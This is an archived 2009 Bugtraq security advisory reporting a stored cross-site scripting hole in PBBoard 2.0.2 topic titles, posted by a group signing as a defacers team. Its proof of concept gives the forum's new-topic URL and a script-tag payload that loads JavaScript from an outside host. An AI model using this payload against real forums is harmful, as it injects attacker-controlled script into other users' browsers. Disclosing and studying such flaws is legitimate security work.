Home page logo
/

bugtraq logo Bugtraq mailing list archives

[Sec-Area Advisory]PBBoard <=2.0.2 - XSS in Topic
From: admin () sec-area com
Date: Tue, 6 Oct 2009 09:16:33 -0600

[Sec-Area Advisory]pbboard <=2.0.2 - XSS in Topic
Details
=======
Product: PHP <= PBBoard
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.pbboard.com

Credits
============
Discovered by: rUnViRuS
site: http://www.sec-area.com

Affected Products:
----------------------------
test on PBBoard 2.0.2
maybe work under 2.0.2 

Original Advisory:
============
http://www.sec-area.com/?p=141

More Details
============
1. Cross-site scripting 
-----------------------------------
enable malicious attackers to inject client-side script into web pages

Proof of concept:
Make a new topic in In the title Write some Javascript/HTML
Back to forums 
You will find the code works

Proof of concept code:
go to : http://www.pbboard.com/forums/index.php?page=new_topic&index=1&id=[Section id ]
then 
In the title Write some Javascript/HTML
like : <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js";></SCRIPT>
Back to forums 
You will find the code works

--------------------------------------------

[W]orld [D]efacers [T]eam
http://www.Sec-area.com

--------------------------------------------


  By Date           By Thread  

Current thread:
  • [Sec-Area Advisory]PBBoard <=2.0.2 - XSS in Topic admin (Oct 06)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]